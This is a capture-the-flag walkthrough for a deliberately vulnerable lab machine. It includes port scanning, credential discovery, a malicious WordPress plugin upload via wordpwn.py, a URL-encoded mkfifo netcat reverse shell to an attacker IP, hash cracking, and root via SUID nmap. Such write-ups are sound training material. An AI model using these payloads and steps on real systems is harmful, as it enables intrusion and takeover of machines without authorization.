# Solution

# Finding the vulnerability

nmap shows open ports 80 and 443.

1
mkdir nmap && nmap -p- -Pn -vv 10.10.231.235 -oN nmap/10.10.231.235-ports

We run -A on the open ports.

1
ports=$(grep '^[0-9]' nmap/10.10.231.235-ports | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

1
nmap -A  -p $ports -vv 10.10.231.235 -oA nmap/10.10.231.235-aggressive-scan

We find the first key on /robots.txt.

We find a username and password on /license.

1
feroxbuster -u http://10.10.231.235

1
echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d 

We use the username and password to login to /wp-login.php.

1
elliot:ER28-0652

# Foothold

We create and uploade a malicious plugin with wordpwn.py.

1
wget https://raw.githubusercontent.com/wetw0rk/malicious-wordpress-plugin/refs/heads/master/wordpwn.py

1
python wordpwn.py 10.6.66.180 4444 10.10.231.235

We navigate to /wp-content/plugins/malicious/SWebTheme.php?cmd=ls.

Next, we get a reverse shell with a url encoded nc mkfifo from www.revshells.com.

1
rlwrap -cAr nc -lvnp 9001

/wp-content/plugins/malicious/SWebTheme.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.6.66.180%209001%20%3E%2Ftmp%2Ff

# Privilege Escalation

We upgrade our shell.

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL + Z

1
stty raw -echo;fg

[Enter]
[Enter]

We find a user robot and a password file we can read.

1
ls /home/

1
cd /home/robot

1
ls -la

We crack the password hash.

1
hashcat -m 0 hash /usr/share/wordlists/rockyou.txt

1
robot:abcdefghijklmnopqrstuvwxyz

We su into the robot user and get the second flag.

1
2
su robot
password: abcdefghijklmnopqrstuvwxyz

1
cat key-2-of-3.txt

We find nmap with SUID privileges.

1
find / -type f -perm -4000  2>/dev/null

We use GTFOBins to get root and the last flag.

1
nmap --interactive

1
!sh

1
cd /root

1
cat key-3-of-3.txt